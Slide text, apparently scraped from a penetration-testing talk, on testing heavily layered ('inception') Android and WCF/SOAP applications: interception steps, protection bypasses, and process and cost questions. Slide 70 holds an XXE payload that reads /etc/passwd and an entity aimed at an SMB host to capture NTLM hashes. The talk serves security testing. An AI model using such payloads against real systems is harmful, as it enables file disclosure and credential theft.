  69. Attack flow – tnSOAP Threat actor Crown jewels Tamper with parameters Intercept TCP connection MiTM on START-TLS Decapsulate WCF Hardware + socat mitm_relay python-wcfbin + few fixes
  70. • <!ENTITY xxe SYSTEM „file:///etc/passwd”> • XXE OOB over FTP • <!ENTITY „abc” SYSTEM „file://securing.biz:445/”> TCP -> START TLS -> WCF -> XML -> XXE -> NTLM https://techblog.mediaservice.net/2018/02/from-xml-external-entity-to-ntlm-domain-hashes/
  71. Attack flow – tnSOAP Threat actor Increased attack surface Tamper with parameters Intercept TCP connection MiTM on START-TLS Decapsulate WCF Hardware + socat mitm_relay python-wcfbin + few fixes
  72. • Not a surprise that there are vulnerabilties • Let’s talk about corporate processes: • How penetration tests are organised? • During which phase you realise it’s an inception app? • What is the cost of implementing inception? • What is the security advantage of inception? • What is the cost of testing an inception app? • How to optimise it? Processes
  73. Attack flow – Android – inception level 7/7 Threat actor Crown jewels Tamper with parameters Bypass integrity checks Bypass root detection Make encryption static Bypass SSL pinning Bypass emulator detection Develop Burp plugin You are in position to start testing
  74. • Not a surprise that there are vulnerabilties • Let’s talk about corporate processes: • How penetration tests are organised? • During which phase you realise it’s an inception app? • What is the cost of implementing inception? • What is the security advantage of inception? • What is the cost of testing an inception app? • How to optimise it? Summary
  75. Protection against what? Sniffing, Man-in-The-Middle, Malware SQL Injection, cross-user access control, business logic
  76. • Not a surprise that there are vulnerabilties • Let’s talk about corporate processes: • How penetration tests are organised? • During which phase you realise it’s an inception app? • What is the cost of implementing inception? • What is the security advantage of inception? • What is the cost of testing an inception app? • How to optimise it? Summary
  77. Thank you! Twitter: @j_kaluzny Jakub.Kaluzny@securing.biz MORE THAN SECURITY TESTS.
Advertisement